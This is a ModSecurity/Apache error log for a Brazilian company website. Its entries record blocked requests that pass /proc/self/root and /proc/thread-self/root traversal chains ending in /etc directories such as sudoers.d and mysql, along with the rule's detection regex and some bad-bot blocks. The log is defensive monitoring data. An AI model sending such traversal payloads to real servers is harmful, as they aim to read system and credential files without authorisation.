[Tue Mar 17 08:32:59.702488 2026] [:error] [pid 2305:tid 140411725141760] [client 74.7.241.46:33114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk76wQohV2v-7oj5HHzqQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:33:01.030453 2026] [:error] [pid 1961:tid 140411616036608] [client 74.7.241.46:33120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk77XRXaaWotPICgYsduwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:33:04.602917 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:33122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk78NCmCSWTlPouqorEAgAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:33:05.573267 2026] [:error] [pid 7000:tid 140411741927168] [client 74.7.244.31:35912] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk78RePVOt35XCGZP8n-wAAA4A"]
[Tue Mar 17 08:33:19.031825 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.228.16:40288] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk7_-82sZHvlq4xgHq8SgAAApc"]
[Tue Mar 17 08:33:22.491516 2026] [:error] [pid 7000:tid 140411548894976] [client 74.7.243.203:39856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8AhePVOt35XCGZP8oGgAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:33:41.194305 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:34178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8FdCmCSWTlPouqorEMgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:33:49.252430 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:34854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8He82sZHvlq4xgHq8VAAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:34:09.375191 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:56104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8MaBJNF7axNlVR0X1mAAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:34:29.164885 2026] [:error] [pid 7000:tid 140411548894976] [client 74.7.241.46:33134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8RRePVOt35XCGZP8oXAAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:34:31.551983 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:52992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8R-82sZHvlq4xgHq8WQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:34:32.893492 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.241.46:52998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8SJDEJR9VXonE_-1GxAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:34:36.179091 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.46:53014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8TAeiSKl8TjouI-b7CAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:34:37.427092 2026] [:error] [pid 11469:tid 140411674785536] [client 74.7.241.46:53022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8TZDEJR9VXonE_-1GxgAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:34:52.113389 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:60834] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8XAeiSKl8TjouI-b7GwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:35:05.216636 2026] [:error] [pid 1961:tid 140411733534464] [client 74.7.241.46:47386] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8aXRXaaWotPICgYsd3QAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:35:15.057662 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.46:44526] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8cweiSKl8TjouI-b7JQAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:35:20.939968 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.243.203:54078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8eAQohV2v-7oj5HH0BQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:35:40.266383 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.241.46:33184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8jFKJy4A1bGlmj9BOeQAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:35:40.492111 2026] [:error] [pid 1210:tid 140411574073088] [client 74.7.243.203:46188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8jFKJy4A1bGlmj9BOegAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:35:42.644995 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:37824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8ju82sZHvlq4xgHq8aQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:36:32.766952 2026] [:error] [pid 7000:tid 140411708356352] [client 74.7.243.203:34210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8wBePVOt35XCGZP8ozwAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:36:34.103665 2026] [:error] [pid 1961:tid 140411683178240] [client 74.7.243.203:44314] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8wnRXaaWotPICgYsd8wAAA0c"], referer: 